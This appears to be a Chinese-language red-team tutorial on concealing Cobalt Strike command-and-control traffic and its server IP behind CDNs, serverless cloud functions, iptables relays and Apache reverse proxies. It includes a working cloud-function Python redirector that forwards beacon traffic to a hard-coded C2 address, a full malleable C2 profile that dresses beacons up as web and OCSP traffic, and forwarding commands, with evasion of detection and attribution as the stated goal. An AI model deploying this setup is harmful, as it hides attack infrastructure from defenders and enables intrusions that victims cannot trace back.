红队APT-流量隐匿篇&C2工具&反溯源&隐藏源IP&云函数&CDN节点&数据中转&反向代理
➢ 红队APT-流量隐匿-C2证书&特征分析
➢ 红队APT-溯源隐藏-C2通讯&中转节点
#CDN
利用意义:
1、用于隐藏上线服务器IP
2、节点IP均为厂商上线
利用过程:
1、国内厂商备案域名配合
操作见打包文档
2、国外cloudflare域名配合
参考:https://mp.weixin.qq.com/s/EtO2kvt80dd7U_zHR4ZoYQ
#云函数:
服务商为企业和开发者们提供的无服务器执行环境,
帮助您在无需购买和管理服务器的情况下运行代码。
阿里云:https://www.aliyun.com/product/fc
腾讯云:https://console.cloud.tencent.com/scf/
华为云:https://developer.huawei.com/consumer/cn/agconnect/cloud-function/
百度云:https://cloud.baidu.com/product/cfc.html
移动云:https://ecloud.10086.cn/home/product-introduction/sfc
天翼云:https://www.ctyun.cn/products/hsjs
字节跳动轻服务:https://qingfuwu.cn/
AWS Lambda:https://aws.amazon.com/lambda/
Google Firebase:https://firebase.google.com/
Azure Function:https://azure.microsoft.com/en-us/services/functions/
利用意义:
1、用于隐藏上线的服务器IP
2、域名白名单出网上线
利用过程:
1、创建云函数
2、创建函数服务
运行环境选择python3.6
并复制如下代码并修改CS的IP
# -*- coding: utf-8 -*-
import json,requests,base64
def handler(event, context):
C2='https://146.56.204.52:443' #https
#C2='https://146.56.204.52:80' #http
path=event['path']
headers=event['headers']
print(event)
if event['httpMethod'] == 'GET' :
resp=requests.get(C2+path,headers=headers,verify=False)
else:
resp=requests.post(C2+path,data=event['body'],headers=headers,verify=False)
print(resp.headers)
print(resp.content)
response={
"isBase64Encoded": True,
"statusCode": resp.status_code,
"headers": dict(resp.headers),
"body": str(base64.b64encode(resp.content))[2:-1]
}
#return event
return response
3、创建触发器
触发方式选择API网关(HTTP/S)触发-勾选启用集成响应-点击提交
4、配置触发器
点击API服务名对触发器进行配置
将路径修改为/{path+},然后点击立即完成
5、配合profileS修改URL
set sample_name "t";
set sleeptime "3000";
set jitter "0";
set maxdns "255";
set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";
http-get {
set uri "/api/x";
client {
header "Accept" "*/*";
metadata {
base64;
prepend "SESSIONID=";
header "Cookie";
}
}
server {
header "Content-Type" "application/ocsp-response";
header "content-transfer-encoding" "binary";
header "Server" "Nodejs";
output {
base64;
print;
}
}
}
http-stager {
set uri_x86 "/vue.min.js";
set uri_x64 "/bootstrap-2.min.js";
}
http-post {
set uri "/api/y";
client {
header "Accept" "*/*";
id {
base64;
prepend "JSESSION=";
header "Cookie";
}
output {
base64;
print;
}
}
server {
header "Content-Type" "application/ocsp-response";
header "content-transfer-encoding" "binary";
header "Connection" "keep-alive";
output {
base64;
print;
}
}
}
6、启动CS加载profile
./teamserver IP 密码 xxx.profile
#数据中转
1、转发机设置转发:(80改443即https)
iptables -I INPUT -p tcp -m tcp --dport 1234 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 1234 -j DNAT --to-destination 146.56.204.52:2345
iptables -t nat -A POSTROUTING -j MASQUERADE
iptables -I FORWARD -j ACCEPT
iptables -P FORWARD ACCEPT
sysctl net.ipv4.ip_forward=1
2、CS监听器配置转发机IP:1234
#反向代理
1、代理机安装Apache:
apt-get install apache2
a2enmod proxy proxy_ajp proxy_balancer proxy_connect proxy_http
systemctl restart apache2
2、中间件设置转发:
vim /etc/apache2/sites-enabled/000-default.conf
http:
ProxyPass "/" "http://CS的IP/"
ProxyPassReverse "/" "http://CS的IP/"
https:
ProxyPass "/" "https://CS的IP/"
ProxyPassReverse "/" "https://CS的IP/"
3、重启Apache服务
service apache2 restart
4、CS监听器配置转发机IP
